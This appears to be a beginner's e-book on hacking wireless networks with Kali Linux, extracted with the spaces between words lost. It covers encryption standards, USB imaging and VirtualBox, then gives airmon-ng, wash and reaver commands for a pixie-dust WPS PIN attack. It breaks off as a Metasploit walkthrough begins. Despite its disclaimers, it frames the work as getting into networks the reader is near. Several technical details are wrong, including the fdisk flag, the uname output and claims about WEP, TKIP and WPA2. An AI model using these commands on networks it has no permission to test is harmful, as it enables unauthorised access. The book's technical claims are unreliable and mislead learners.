WIRELESSHACKING
HOWTOHACKWIRELESSNETWORKS,ASTEP-BY-STEPGUIDE
FORBEGINNERS
JAMESSQUIRES
CONTENTS
1.
Hacking:HowtoHackWirelessWEP/WPA/WPA2Networksin2Hours:AStep-by-StepGuidefor
2.
3.
4.
5.
HowtoSetupandInstallKaliLinuxonaUSBKey
6.
VirtualizationandUsingVirtualBox
7.
8.
Step-by-StepGuidetoRunningandUsingKaliLinux
9.
10.
11.
Allrightsreserved.
©Copyright2016-Allrightsreserved.
Innowayisitlegaltoreproduce,duplicate,ortransmitanypartofthisdocumentineitherelectronicmeansorinprinted
format.Recordingofthispublicationisstrictlyprohibitedandanystorageofthisdocumentisnotallowedunlesswith
writtenpermissionfromthepublisher.Allrightsreserved.
Theinformationprovidedhereinisstatedtobetruthfulandconsistent,inthatanyliability,intermsofinattentionor
otherwise,byanyusageorabuseofanypolicies,processes,ordirectionscontainedwithinisthesolitaryandutter
responsibilityoftherecipientreader.Undernocircumstanceswillanylegalresponsibilityorblamebeheldagainstthe
publisherforanyreparation,damages,ormonetarylossduetotheinformationherein,eitherdirectlyorindirectly.
Respectiveauthorsownallcopyrightsnotheldbythepublisher.
LegalNotice:
Thisbookiscopyrightprotected.Thisisonlyforpersonaluse.Youcannotamend,distribute,sell,use,quoteor
paraphraseanypartorthecontentwithinthisbookwithouttheconsentoftheauthororcopyrightowner.Legalaction
willbepursuedifthisisbreached.
DisclaimerNotice:
Pleasenotetheinformationcontainedwithinthisdocumentisforeducationalandentertainmentpurposesonly.Every
attempthasbeenmadetoprovideaccurate,uptodateandreliablecompleteinformation.Nowarrantiesofanykindare
expressedorimplied.Readersacknowledgethattheauthorisnotengagingintherenderingoflegal,financial,medical
orprofessionaladvice.
Byreadingthisdocument,thereaderagreesthatundernocircumstancesareweresponsibleforanylosses,director
indirect,whichareincurredasaresultoftheuseofinformationcontainedwithinthisdocument,including,butnot
limitedto,—errors,omissions,orinaccuracies.
INTRO
HowToHackAnyWirelessNetwork!AStepByStepGuideForBeginners
ByJamesSquires
T
1
HACKING:HOWTOHACKWIRELESSWEP/WPA/WPA2
NETWORKSIN2HOURS:ASTEP-BY-STEPGUIDEFOR
BEGINNERS
hementionoftheword“hacking”bringstomindallsortsofillegalactivity,solet’sget
adisclaimeroutofthewayfirstofall.Wearenotsupportinganyillegalactivity
whatsoever.Thehackingmethodspresentedinthisbookareintendedtobeusedby
informationsecurityprofessionalsandnetworksecuritypersonnel.Youshouldonlybe
usingthisinformationinawaythatislegalinyourlocation.
Networkhackingshouldonlybeperformedonnetworksthatyouhavepermissionto
performhackingon.Youwillwanttochecktomakesurethatitislegalforyoutodosoin
thecity,stateandcountrywhereyoulive.
Themethodspresentedinthisbookaremeanttobeusedtocheckforsecurityleaks,to
strengthensecuritynetworksandtohelpprivatenetworksoperatemoresmoothly.
Nowthatwe’vegottenthelegalessentialsoutoftheway,let’stalkabouthowyouwillgo
abouthackingyournetwork.Ifyouwantsomeguidancebeyondwhatiscoveredinthis
book,checkouttheadditionalresources.Thereyouwillfindinstructionsonhowto
receivefreevideosdeliveredstraighttoyourinbox.Justenteryouremailaddressonthe
site,andwewillsendyoufreestep-by-stepvideostohelpyououtwithallsortsof
commonoperatingsystemproblems.You’lllearnsomenewtricksandbeabletobetter
controltheoperatingsystemandkeepyoursecuritytight.
GettingtoKnowLinux
Inordertousethetoolswe’llbetalkingabout,youneedtohaveabasicunderstandingof
Linux.Linuxisanopensourceoperatingsystem,whichmeansthatanyonecanmodifyit
ordistributeit.It’sfreetouseanddownload,butspecialtyLinuxprograms,developedby
variouscorporationstobeusedformorespecificpurposes,cancostyou.Thedevelopers
willsellthosemodifiedLinuxsystemstowhoeverisinterestedinthem.SowhileLinuxis
free,ifyouwantsomethingdifferentthanthevanillaLinuxsystem,youmayhavetopay
forit.
LinuxisalotlikeWindows,inthatitisanoperatingsystem.Itbasicallyallowsallthe
programsonyourcomputertoworktogetherunderaunifiedsystem.Withoutanoperating
system,youcan’tusetheprogramsonyourcomputer.ButLinuxcanworkpractically
anywhere-onyourphone,tabletorevenyourwristwatch.Itisconstantlychangingtoo,
beingupdatedandmodifiedbydevelopersandcompaniesallovertheworld.New
versionsofLinuxcomeoutmoreoftenthananyotheroperatingsystem,soit’sagoodidea
tofamiliarizeyourselfwiththelatestversionbeforeyougettoofarintosomeofthetools
wewillbeusing.
OurApproachtoHackingaNetwork
Usingthestep-by-stepguideswehavelaidoutforyouinthisbook,youcanlearnhowto
hackintoawirelessnetwork,andyou’llbeabletodoitinaslittleastwohours.Itmaynot
beaverysimpleprocess,butwewillsimplifyitforyouasmuchaspossible.We’regoing
toassumeyouarenewtoallofthisandthatyoudon’tknowalltheterminologyand
processes.Thatway,thisbookcanbeusedbypracticallyanybody.Ifyoualready
understandsomeofthesteps,thenyoumaywanttoskipaheadtothepartoftheprocess
thatisgivingyoutrouble.We’regoingtogoslowlythroughallthistomakesureyoufully
understanditandthatyouhavenoproblemsgettingintoyournetwork.
LiveOperatingSystems
Aliveoperatingsystemisonethatisportable.ItcanbedownloadedintoaUSBdriveora
DVD.Youmighthearitcalleda“OS(operatingsystem)onastick”orevena“computer
onastick”.ThisbasicallymeansthatitcanbetakenanywhereonaUSBstick.The
operatingsystemcanfunctionmuchlikeacomputersometimes,evenholdingfilesand
programs,soyoucanessentiallytakeyourcomputerwithyou.
IfyouplugthatliveoperatingsystemintotheUSBportonacomputerthatisalready
runningWindowsorMacOSorUNIX,thenitwillstillbeabletousetheoperating
systemyouhaveonthestick.Inthiscase,wearetalkingaboutLinuxoraversionof
Linux.OnceyouplugyourUSBstickinorinsertyourDVD,theoperatingsystem
containedonthatportablemediawilltemporarilyoverridewhateveroperatingsystemis
currentlyinuseonthecomputer.Itwon’tmakeanypermanentchangestothatoperating
system.Itjusttakesoverforawhile.Onceyouremoveyourmedia,thenyouroperating
systemgoeswithitandthecomputer,phone,tablet,etc.canjustgobacktonormal.
Now,thisisreallyusefulwhenyouaretryingtoperformsecuritychecksoncomputers
thatrunonyourcompany’snetwork.Ifyouareinchargeofnetworksecurity,youmay
needtocheckindividualcomputers,butyouwantyourprogramsandfilestobeaccessible
throughthatcomputersoyoucanperformdiagnostics.Theliveoperatingsystemisthe
perfectsolutionforthat,anditallowsyoutotakewhatyouknowandwhatyouare
familiarwithanduseitanywhere.
We’regoingtoshowyouhowtodothat.
N
2
WHATISKALILINUX?
owwetalkedaboutversionsofLinuxthataremodifiedbycompaniesorvarious
developersforspecifieduse.That’swhatKaliLinuxis,anditisspecializedtoprovide
networksecurity.Insomeways,itisverybasic.Itwon’tworkwithalotofprograms,
becauseitisn’tmeanttoprovidegeneraloperatingsystemservices.Itdoesn’tworkquite
likeWindowsoreventhebasicLinuxsystem.Instead,itislaserfocusedonnetwork
security.
WewillbeusingKaliLinuxinourhackingguides,sowe’regoingtocoverwhatit’sall
about.
HowtoGetKaliLinux
WhileKaliLinuxisusedbysecurityprofessionalsallovertheworldandisahighly
specializedversionofLinux,itwon’tcostyouanything.Thedevelopersvowthatitwill
alwaysbefree,evenastheycontinuetoprovidesupportandupdatesfortheirversionof
Linux.TheyalsomakesurethatmodificationsarenotbeingmadetotheOSbyjust
anyone.TheycallKaliLinuxanopensourceOS,butonethatisdevelopedbyasmall
groupofpeopleunderverytightsecurity.Theyvetallchangescarefullyandmakesure
thatabsolutesecurityismaintainedontheproduct.
YouonlywanttodownloadKaliLinuxfromaverifiedsource.Thefollowingpages
https://www.kali.org/downloads
https://www.offensive-security.com/kali-linux-
bothoffersecuredversionsofKaliforyoutodownload.
WhatKaliLinuxDoes
Thiskindofoperatingsystemisknownasadistributionanditisdesignedforpenetration
testingandsecurityauditing.Itismeantforasingleuseratatime.Thislimitsthe
potentialforsecuritybreaches.
Infact,thissystemisveryparticularaboutsecurity,sinceitisdesignedforpeoplewho
workininformationandnetworksecurity.Itcanbemodifiedtoallowformoreusersand
tobecomecompatiblewithmanyprograms,butthatisn’tadvisable.Thatcancompromise
thesecurityofthesystem,whichdefeatsitspurpose.
ItisrecommendedthatyouworkwithintheparametersoftheKaliLinuxsystemsoasnot
toallowinanypotentialsecuritybreaches.Becauseitissuchaclosedsystem,itwon’tbe
compatiblewithprogramsthatpermitalotofonlineinteractionsoropensourcing.So
Steamwon’tworkwithitatall,norwillLaunchpadandmanyothercommonlyused
programs.Ifyouwanttorunthoseprograms,thenyoushouldreallyuseadifferent
operatingsystemthatisn’tdesignedtobeasnarrowlyfocusedasthisoneis.
IfyoutrytoinstalladditionalprogramsonLinuxthatconnecttoanetwork,suchas
Bluetooth,thenyouwon’thavemuchluck.Thesekindsofservicesaredisabledunderthe
defaultsettingsusedbyKaliLinux.Thedistributionisintendedtoremainsecure,and
unlessyoutamperwiththesettingsitwillstaythatway,eventothedetrimentofthe
programsyouwanttouseonit.
Youcantamperwiththeprogramasmuchasyoulike,openingitupforcompatibilitywith
justaboutanything,sinceitrunsoffofLinux.Butthat’snotagoodideaifyouwantto
maintainsecurity.Asyougetmoreusedtohowitworks,youcandomorewithitand
modifyitasyoulike,butwhenyoufirststartout,youprobablyshouldn’ttrytotamper
withit.Waituntilyouaremorefamiliarwithittostartdoinghigh-levelmodifications.
Y
3
WHATISAWEP,AWPA,ANDAWPA2?
ourWi-Finetworkiswhatconnectsallyourinternet-capabledevicestogetherinone
area.Inanofficebuilding,thatnetworkconnectsallthecomputers,scanners,tabletsand
otherdevices.Thiscangivethemameasureofsharedsecurity,asitmakesitdifficultfor
outsideforcestopenetrateandbecomepartofthenetwork.Itconservesresourcesand
helpsthecompanymaintaincontrolovertheircomputers’security.
Buthowsecureisyournetwork?Thatwillpartlydependonwhatkindofsecurity
classificationyourWi-Fihas.Wearegoingtolookatthreetypesofthese-WEPs,WPAs
andWPA2s.
Ifyouarereadingthischapter,thenyouprobablyneverpaidmuchattentiontothefew
lettersbesideyourWi-Finetwork’sname.Youmaynothavethoughttheymattered,but
somebodyhadtopickoneofthesechoiceswhentheyfirstsetupthewirelessnetworkyou
areusing.Oddsare,theydidn’tthinktoomuchabouttheirchoiceandjustwentwiththe
mostobviousone.
Butthatcanbeamistake.Theseencryptionstandardsdeterminehowsecureyournetwork
is.IfsomeoneisgettingintoyoursystemandusingyourWi-Fitodosomethingillegal,
thentheFBIaregoingtobehavingavisitwithyou.Theymaygettotheactualinfiltrator
eventually,buttheywillstartwiththeWi-Fisource.Knowinghowtokeepoutintrudersis
abigpartofrunningasecurenetwork.Beforeyoucandothat,youfirsthaveto
understandthesecurityclassificationsforWi-Finetworks.
WEP
WiredEquivalencyPrivacy,orWEP,istheWi-Fisecurityalgorithmthatisusedinmost
placesaroundtheworld.Partofthathastodowithhowlongithasbeenaround,anda
partofitisjustbecauseitisusuallythefirstchoiceinalistofsecurityalgorithms.People
whodon’tknowmuchaboutthesejustassumethatthefirstchoiceisthebest,whichis
whyitisconsideredthedefaultoption.Theydon’tunderstandwhatthedifferenceis
betweenthesechoices.
WEPbecamethestandardbackin1999,butitwasneververystrong.Astechnology
advanced,strongerversionsofWEPwereintroduced,butmostofthetime,themajorityof
peoplewerestillusingtherelativelyweakversions.
Thisstandardlostitsvalueovertimeasweaknesseswerediscovered.Whencomputing
powerincreasedtothepointwhereitbecauseasimplemattertobreaktheencryptionand
discovertheWi-Fipassword,WEPwasdroppedasthestandardbytheWi-FiAlliancein
2004.
WPA
Wi-FiProtectedAccess,orWPA,wasmeanttoreplaceWEPasitbegantoshowsignsof
weakness.TheWi-FiAllianceformallyadopteditin2003.AllWPAkeysthatareusedare
256-bit,whichmakesthemmuchstrongerthanthekeyscommonlyusedinWEPs(64and
128-bit).Thekeysrefertothelevelofencryptionthesystemhas,andWPA’swas
remarkablystrongerthanitscounterpart.
WPAshavemessageintegritycheckswhichlookforpacketsofdatathathavebeenaltered
orcapturedbyaninfiltratorasthesepacketspassbetweentheclientandtheaccesspoint.
Thekeysystemisevenalotmoreadvancedthanwhatwasbeingusedbefore.The
originalkeysystemthatcamewiththeWPAisoutdatednow,butatthetime,itwasahuge
leapforwardfornetworksecurity.
ButtheWPAhassomesecurityflaws.Itcamewithsomeofthesamecapabilitiesasits
predecessor,includingaTKIP(TemporaryKeyIntegrityProtocol),whichrequiredthat
thedeviceacceptfirmwareupdatesregularly.Thispresentedabackdoorforthesystem,
whichhackersweresoonabletoexploit.
TheWPAismoresecurethanitspredecessor,butitisalsostillvulnerabletoattack.This
hasbeenshowntimeandagaininpublicdemonstrations.Eventhoughitishardertobreak
into,andsupplementarysystemsusuallyserveastheaccesspointforintrudersratherthan
thealgorithmdirectly,thevulnerabilityisstillthere.
WPA2
Wi-FiProtectedAccess2,orWPA2,tookoverforthestandardWPAbackin2006.That’s
nottosaythattheolder,lesssecurealgorithmsaren’tstillavailable,becausetheyare.
TheWPA2stillusesTKIP,butitisconsideredafallbacksystemtobeusedonlyifthe
primarysystemfails.WhatreplacesTKIPistheCCMP,orCounterCipherModewith
BlockChainingMessageAuthenticationCodeProtocol.Thisnewprotocolisexcellentat
determiningifmessagesenteringthealgorithmareauthorized,makingitverydifficultto
infiltratethesystem.
Thissystemstillhasitsweaknesses,buttheyarefarfewerandmuchhardertoexploit.
Becausethiskindofalgorithmissoincrediblydifficulttopenetrate,theonlyentitieswho
useitthatwouldhavetoworryaboutinfiltrationarelargecompaniesthatdealwith
corporateespionage.Itsimplyisn’tworththeeffortitwouldtaketobreakintothissystem
fortheinformationcontainedontheaverageprivatenetwork.
AES
Wecan’ttalkaboutWEP,WPAandWPA2withoutmentioningAES.Itstandsfor
AdvancedEncryptionStandard,anditisaspecificationofasecurityalgorithm.Often,
AESisincludedinaWPA2algorithm,butitmaynotalwaysbebydefault.Forthevery
bestsecurity,youwanttopartneraWPA2securityalgorithmwithAES.Thatwillgive
youunprecedentedlevelsofsecurityandmakeyournetworkpracticallyimpenetrable.
WhichOneShouldYouUse?
Ifyouhavetheresourcesandtheprocessingpowertohandleit,youdefinitelywanttogo
withaWPA2securityalgorithm,preferablywithAESactivatedaswell.Butnoteveryone
willhavethatkindofprocessingpoweravailabletothem.
Ifyoudon’thavemuchprocessingpowerorresourcesatyourdisposal,thenusinga
WPA2securityalgorithmonsomethinglikeasmall,personalnetworkwouldnotbe
advisable.Itcanloweryourconnectionspeeds,createperformanceproblemsand
unnecessarilybogdownyoursystem.
Foranyenterprise-levelnetworks,however,WPA2withAESisrecommended.Itprovides
themostsecurity,andmostmediumtolargebusinesseshavethenecessaryresourcesto
runitsmoothlywithoutanyhiccupsintheirinternetspeed.
Y
4
DOWNLOADINGKALILINUX
ouhavetobeverycarefulaboutwhereyoudownloadKaliLinuxfrom.Thereare
plentyoffacsimileversionsouttherethatarenotmadebytheoriginaldevelopers.It
wouldbeveryeasyforanunscrupulousindividualtoslipinavirusorsomeother
malwarethatcouldcompromiseyournetwork.That’swhyyouhavetomakesureyouare
gettingnotonlya“pure”copyoftheoperatingsystembutalsothatyouaredownloading
itfromatrustworthysource.
ThebestwaytocertifythatwhatyouaregettingistherealdealistoverifytheSHA1
checksumsagainstastandardvalue.
IfyouwanttoruntheKaliLinuxOSfromaUSB(whichisnecessarytohackanetwork)
thenyouwillneedtoobtainabootableISOimage.A32-bitora64-bitimagewillwork
fine.
Youmaynotbequitesurewhatarchitectureyoursystemhasthatyouwanttorunthe
systemon.Ifthat’sthecase,thenyoucanrunthecommand“uname-m”.Justinputthis
onthecommandlineonyourIntel-basedPC.Aresponsewillcomeback.Ifitsays
“x86_64”thenyoushouldbeusingthe64-bitimage.Thatonewillhave“amd64”inthe
nameofthefile.
Youmightgettheresponse“1386”.Ifthatisthecase,thenusea32-bitimage.Thiswill
have“i386”inthefilename.
IfyouhaveaWindowsOS,thentheprocedurewillbeabitdifferent.ForWindows7or
WindowsVistausers,youcanbeginbyopeningtheStartmenu.GotoComputer,then
clickonProperties.UndertheSystemheading,viewthetypeofsystemthatyouhave.
ForaWindowsXPOS,thestepsaresimilar.GotoStarttobegin.Thenright-clickonMy
ComputerandclickPropertiesfromthere.Ifyouseethewords“x64edition”there,then
youhavea64-bitsystem.Ifnothingiswrittenthere,thenit’sa32-bitsystem.
KalicanberunasaguestunderVMware.ItactuallyalreadyhasVMwareToolsinstalled
andcanbefoundasapre-builtVMwarevirtualmachine.IfyouwanttheVMwareimage,
youwillfindtherearethreevariations-64-bit,32-bitand32-bitPAE.
ARM-baseddevicescanhavevariedarchitectures.Thatmeansthatasingletypeofimage
won’tworkacrossalltheARMmachines.You’llhavetodownloadKaliLinuximages
T
thatarepre-builtforARMarchitecture.YoucangotoGitHubtofindscriptsthatwillhelp
youbuildARMimagesonyourown.
IfyourunintoanytroublesettingupanARMenvironmentthatwillworkforKaliLinux
oryouwanttoknowhowtobuildyourowncustomchroot(arootdirectorychange
operation),youcanusethesearticles
http://docs.kali.org/development/kali-linux-arm-chroot
heKaliLinuximagescanbefoundontheOffensiveSecuritywebsite:
OffensiveSecurity.com.
VerifytheImageYouUseforKaliLinux
YoudefinitelywanttomakesurethatyouhaveanactualKaliLinuxOSandnotsome
imposter.Thisprofessionalpenetrationtestingtoolismeanttomaintainnetworksecurity.
Youcanuseittoinvestigatecomputersandnetworks,andyouneedtobeabletotrust
whatittellsyou.IfthereisanyproblemwithitandyouhaveaversionofKaliLinuxthat
differsfromtherealdeal,thenyoucanbecompromisingyournetworkandyourpersonal
information.Don’ttakethatrisk.Makesureyouverifywhatyouaregettingbeforeyou
downloadit.
SinceKaliisapenetrationtestingdistribution,afakeversionofitcouldcrippleyour
system.Therearelotsofthesebogusversionsoutthereandthereisnoshortageofpeople
whowouldwanttoputinsomesketchyadditionstothisdistribution.
Thebestwaytoavoidthisproblemistomakesureyouaredownloadingonlyfromthe
officialKalidownloadpages.YouwillneedanSSLtobrowsethesepages.That’sa
standardencryptionthatprotectstheserveandtheclientfrominterference.Itbasically
keepsthebadguysout.Buteventhesesourceshavetheirweaknesses.
Afteryoudownloadthenecessaryimage,besuretoverifyitbeforeyourunit.Youwant
tovalidatethatitistherealdealandnotsomethingthatcouldcontainmalware.
ThesimplestwaytodothisistocalculatethehashoftheISO’sSHA1.Thenjustinspectit
andcompareitagainstthevalueyoufindontheKaliLinuxsite.
Onceyou’vedoneallthis,andyouaresureyouaregettinganactualKaliLinux
distribution,youcanthendownloadit.
K
5
HOWTOSETUPANDINSTALLKALILINUXONAUSBKEY
aliLinuxisthebesthackingtooloutthere.Itissupersecure,anditismadeby
seasonedprofessionalswhoknowwhattheyaredoing.What’ssogreataboutthissystem
isthatyoucanrunitfromaUSBkeyandnothavetoworryaboutcompromisingor
alteringyourcurrentoperatingsystem.WhenyoucarrythisOSonaUSBkey,itcanbe
takentoanycomputerorcompatibledeviceandmadetowork.Itonlytemporarily
overridesthecurrentoperatingsystemonthatdevice.
OnceyoutakeoutyourUSBkey,youremoveKaliLinuxfromthedevice.Itdoesn’tleave
behindanytrace,anditdoesn’tchangethesettingsoroperatingsystemofthedeviceyou
usediton.Itiscompatiblewithanyoperatingsystembecauseitworksaroundthem.
Thisisconsideredanon-destructivewaytouseKaliLinux.Itletseverythinggobackto
normalonwhateverdeviceyouuseiton,makingnochangestothehost’ssystem.It’salso
portable,soyoucantakeitfromoneworkstationtothenextandfromonedevicetothe
nextanddowhatyouneedtodo.Itstartsupveryfast,usuallyinjustafewminutes,on
whateversystemyouputitinto.
Youcanalsocustomizeyourbootabledrive,usingaKaliLinuxISOimagethatyourolled
yourself.Itisalsopotentiallypersistent.Thismeansthat,onceyouperformtheproper
configurations,yourKaliLinuxLivedrivewillkeepthedataithascollectednomatter
howmanytimesyourebootit.
InstallingontoYourBootableUSBKey
WewillstartwithabootableUSBdrivethatalreadyhasanISOimageofKaliLinux.Be
surethatISOimageisverified.Wetalkedaboutthisinthelastchapter.
ForWindowsusers,youwillhavetofirstdownloadtheWin32DiskImagerutility.You’ll
findthat
.
https://launchpad.net/win32-image-writer
IfyouareusingaLinuxoranOSX,justusetheddcommand.Thishasalreadybeen
installedonbothofthoseplatforms.
Werecommendusinga4GBUSBthumbdriveorlarger.IfyouwanttouseanSDcard,
thenthat’sfine,sincetheprocedureisthesameforboth.Justmakesurethedevicesyou
aregoingtobeusingitonarecompatiblewithyourstoragedevice.
ThemethodfordoingthiswilldifferdependingonwhatOSyouhave.We’llbreakit
downonbothofthemajoronesforyou.
ForWindows
StartbypluggingyourUSBdriveintoaUSBportonaPCoperatingWindows.Pay
attentiontothedrivedesignatorthatituseswhenitstartstomount.Thatdesignatorwill
looklike“F:\”.ThenlaunchtheWin32DiskImagersoftware.Onceyouopenthat
software,pickouttheKaliLinuxISOfileyoudownloaded.Thenclick“Write”tocopyit
ontotheUSBdrive,besureyoupicktherightdriveforthisoperation.
Whentheimagingprocessisfinished,youcantakeoutyourUSB.OnmostWindowsOS,
youwillneedtoclickonthesmallarrownearthebottomrightcornerofyourscreento
openatabthatshowsconnecteddevices.BesuretoclickonyourUSBdrivethereto
safelyejectitandensurethatnoinformationislostwhenyoudisconnectit.
Onceallthatisdone,youcanbootKaliLinuxfromyourUSBdevice.
ForLinux
DoingthesamethingonaLinuxisequallyeasy.StartwiththeverifiedISOimageand
copyitovertothedriveusingtheddcommand.Youhavetoberunningasarootforthis
towork.Alternatively,youcanexecutetheddcommandusingsudo.Theinstructions
we’regoingtogiveyouassumethatyouhaveaLinuxMint17.1desktop.Otherversions
aregoingtovaryslightly,butthebasicoperationsrequiredforthistaskshouldallbeabout
thesame.
Justawordofwarningbeforewegetintotheactualinstruction:ifyouaren’tsurewhat
youaredoingwithddcommandoryoujustaren’tcareful,youcanaccidentlyoverwrite
somethingyouaren’tmeaningto.Besuretodoublecheckeverythingyouaredoingso
youdon’tmakeanymistakes.
StartbyidentifyingthedevicepathyouaregoingtousetowritetheimageontotheUSB
drive.Beforethedriveisinserted,performthecommand“sudofdisk-1”
Youhavetobeusingelevatedprivilegeswithfdisk,otherwisetherewon’tbeanyoutput.
Entertheabovecommandinaterminalwindowatacommandprompt.Ifyoudidit
properly,youshouldseeasingledrive.Thatwillprobablylooklikethis“/dev/sda”.That
drivewillbeseparatedintothreepartitions.Theseare/dev/sda1,/dev/sda2,and/dev/sda5.
Fromthere,plugintheUSBdrive,thenruntheoriginalcommandagain.That’ssudofdisk
-1.Onceyoudothat,youwillseeanotherdevicethatwasn’tthereinitially.Itcouldlook
somethinglikethis:“/dev/sdb”.
ThentaketheISOfileandimageitontotheUSBdevice.Itmaytake10-15minutesto
imagetheUSBdevice,sobepatient.Inordertoperformthisprocess,youneedtoexecute
thecommandbelow:
ddif=kali-linux-1.0.9a-amd32.isoof=/dev/sdbbs=512k
Let’sdissectthiscommandforasecond.Intheexampleweareusinghere,theISOimage
thatyouwanttowriteontothedriveisnamed“kali-linux-1.0.9a-amd32.iso”.Yoursmay
lookslightlydifferent.Notethe“32”inthename.Thisreferstothesizeoftheimage.We
usetheblocksizevalue“bs=512k”becauseitissafeandreliable.Youcanmakeitbigger
ifyouwant,butthatcancausesomeproblems,soitisn’trecommended.
Oncethecommandiscompleted,thenitwillprovidefeedbackandnotbeforethen.Your
drivecouldhaveanaccessindicator.Ifitdoes,thenitwillblinkeverysooften.Howlong
thiswholeprocesstakeswilldependonafewfactors-howfastyoursystemis,whatkind
ofUSBdriveyouareusingandhowwellyourUSBportworks.Theoutput,oncethe
imagingiscomplete,willtellyouhowmanybytesarecopiedandgiveyounumbersfor
recordsinandout,whichshouldbethesamenumber.
NowyourUSBisreadytobootintoaKaliLiveenvironment.
K
6
VIRTUALIZATIONANDUSINGVIRTUALBOX
aliLinuxletsyouuseitsownoperatingsystemwithoutinterferingwiththeoriginal
operatingsystemonwhatevercomputertootherdeviceyouaretryingtohackinto.We’ve
coveredthisalready,butwhataboutthoseinstanceswhereyouwanttotestprogramsthat
arenotcompatiblewithoneOSoranother?
That’swherevirtualizationcomesinhandy.Itallowsyoutosetupanoutsidesystemthat
workswiththeexistingoperatingsystem.Thenyoucanjustpickandchoosewhich
programyouwanttotest.YoucantakeaprogramthatworksonlyonWindows,for
example,andrunitthroughyourKaliLinuxdistributionwhileyouhaveyourUSBwith
KaliLinuxpluggedintothehostdevice.Butyouwillneedavirtualizationprogram.
That’swhatVirtualBoxis,anditdoesalotmorethanjustletyoutestspecificprograms
thatwouldn’tnormallybecompatiblewiththeOSyouareusing.Italsoallowsyoutorun
operatingsystemsthatnolongerworkonyourcurrenthardware.Yourcomputermaynot
beabletorunanoldDOSoperatingsystem,butwhenyouuseavisualizationtoollike
VirtualBox,youcanrunthatoperatingsystemagain.
Youcanalsorunmultipleoperatingsystemsatonce.WetalkedabouthowKaliLinux
temporarilyoverridestheoperatingsystemofwhateverdeviceyouhaveitpluggedinto.
ButonceyouhaveVirtualBoxrunning,youcanessentiallyhavebothKaliLinuxandthat
hostoperatingsystemgoingatthesametime.Itgivesyoulotsmoreoptions,allowingyou
todofarmorethanyoucouldotherwise.
Youcanalsosavethestateofasystemandmakethatsystemreverttoitsoldstate
wheneveryouwant.Thatgivesyoutonsofroomtoplayaroundwith.Youcanexperiment
andtrydifferentthings,thenwhenyoumakeafatalerror,youcanjustrevertthesystem.
VirtualBoxcanbefoundonVirtualBox.org.Itisanopensourcetool,soitisconstantly
beingupdatedandit’sfree.Likewithalltheothertoolswecoverinthisbook,youonly
wanttodownloadiffromtheoriginalsource.Ifyougetitanywhereelse,itcouldbea
bogusversionthatiscorruptedwithmalware.
VirtualBoxiscompatiblewithjustaboutanyoperatingsystem,soyoushouldn’thaveany
troublegettingittoworkwithwhateveryouhave.ThelimitsofVirtualBoxcomedownto
yourprocessingpowerandmemory.Youcanrunasmanyvirtualmachinesinsideyour
deviceasyouhavememoryfor.Youcanalsohaveasmantyprogramsrunning
concurrentlyfromasmanyoperatingsystemsasyourdevicecanhandle.
Ifyouhavenotdonemuchhackingbefore,thenVirtualBoxisanindispensabletool.You
cansaveyourcomputer’scurrentstatetorestoreitlaterincasesomethinghappens.
Individualswhotryhackingforthefirsttimeontheircomputeroftenmakemistakesthey
wishtheycouldtakeback.UsingaVirtualBox,theyactuallycan.
ThistoolcanbeaddedtoyourUSBdriveandworkinconjunctionwithKaliLinux,soit’s
noproblemtotakeitwithyouwhereyouneedtogo.
T
7
USINGPIXIEWPSWITHKALILINUX
helatestversionsofKaliLinuxalreadycomeprepackagedwithaprogramcalled
PixieWPS.ItworksreallywellwithKaliLinuxandisanobviouspartnerforit.
WhatPixieWPSdoesisperformanattackonanetwork.Itguessesthepinnumberor
passwordforthenetwork.Thisissomethingthathadtobedonemanuallyinthepast,but
thankstoPixieWPSitisnowautomated.Thisattack,calledapixiedustattack,canguess
mostnetworkpasswordsinaslittleas1secondandasmuchas30seconds.Howlongthe
processtakeswilldependonthenetwork’ssecurity.
ThePixieWPStoolactuallycameintoexistenceoutoftheKaliLinuxforums,soit’s
entirehistoryhasbeenlinkedtothisdistribution.
Ifyoudon’thavePixieWPSonyourKaliLinuxdistribution,thenyouareprobably
runninganolderversion.Youcansimplyusethefollowingcommandtogetanupdatefor
thatprogramandstartrunningthecurrentonewithPixieWPSincluded:“apt-getupdate”.
RunningPixieWPS
Generally,PixieWPSworksbestwithReaver,whichisacomplementaryprogramthat
aidsintheofflinenetworkattack.We’regoingtoassumeyouhaveReaverinstalledwith
yourKaliLinuxforthisguide.
InordertoobtainReaver,youcangotoGitHubanddownloadit-thatis,ifyoudon’t
alreadyhaveit.LikePixieWPS,Reavershouldalreadybeinstalledonthelatestversionof
KaliLinux.ThisopensourcetoolusesabruteforceapproachtohackingintoaWi-Fi
network.PixieWPShelpsrefineitsapproachandensurethatitdoesn’ttakeverylongto
getthedesiredresults-namely,accesstothenetwork.
Now,Reaverwillsometimestimeoutorgetstuckinaloop.Itwilljustdothesamething
overandoveragain.Whenthishappens,youshouldjustletitrun.Itwilleventuallywork
itselfout.makesureyoukeepitclosetotheroutersoitdoesn’thaveanytroubleaccessing
thenetwork.
Ifyoufeellikethepixiedustattackistakinglongerthanyouwouldlike,youcanalways
comebacklater.JustpausetheprogramwithCtrl+C.Thiswillsaveyourprogress,and
youcancomebacklaterandstartbackrightwhereyouleftoff.Sometimes,thereare
factorsthatpreventtheattackfrombeingcompletedintheusual30-secondtimeframe.
Theremaybenetworkproblems,compatibilityissuesorotherproblemsthatarehindering
yourprogress.Justknowthatyoudon’thavetoperformtheentireattackinonego.
OnceyouhavealltherequisiteprogramsonKaliLinux,youcanlaunchapixiedustattack
prettyeasily.Justputyourinterfaceintomonitormode.Youdothatwiththecommand
“airmon-ngstart”.Thenyoucanstartlookingforatarget.Usethecommand“wash-i”on
themonitorinterface.
YouwillneedtheBSSID(individualizedrouternumber)andchannelnumberoftherouter
beforeyoubegintheattack.Youalsowanttomakesureyoursignalisstrong.
Youcanlaunchyourattackbyenteringthecommand“reaver-i(monitorinterface)-b
(BSSIDoftherouter)-c(therouter’schannelnumber)-vvv-K1-f”.
Thatshouldgiveyouthepasswordshortly.Thisisn’tsomethingthatwillworkonevery
router,butmostofthemshouldbesusceptibletoit.UsingPixieWPSisalmostalways
moreeffectivethansomesortofbruteforcetactic,anditworkslotsfaster.
O
8
STEP-BY-STEPGUIDETORUNNINGANDUSINGKALILINUX
nceyouhaveKaliLinuxdownloadedandyouarenearanetworkyouwanttohack
into,youcanstartthehackingprocess.Belowareafewstep-by-stepguidesonhowtodo
it.
BasicHackforOlderWindowsSystems
We’regoingtostartwithaverybasichackthatworksonmanyolderoperatingsystems.It
mightnotbethemostpracticalone,butit’sagoodstartinghackforbeginners.Withthis
hack,youcangetagoodsenseofwhatisinvolvedandworkupfromthere.
1. StartupKaliLinuxandopenanewterminalup.
2. ThenstartupMetasploit.ThisisaprogramthatisalreadyincludedonKali
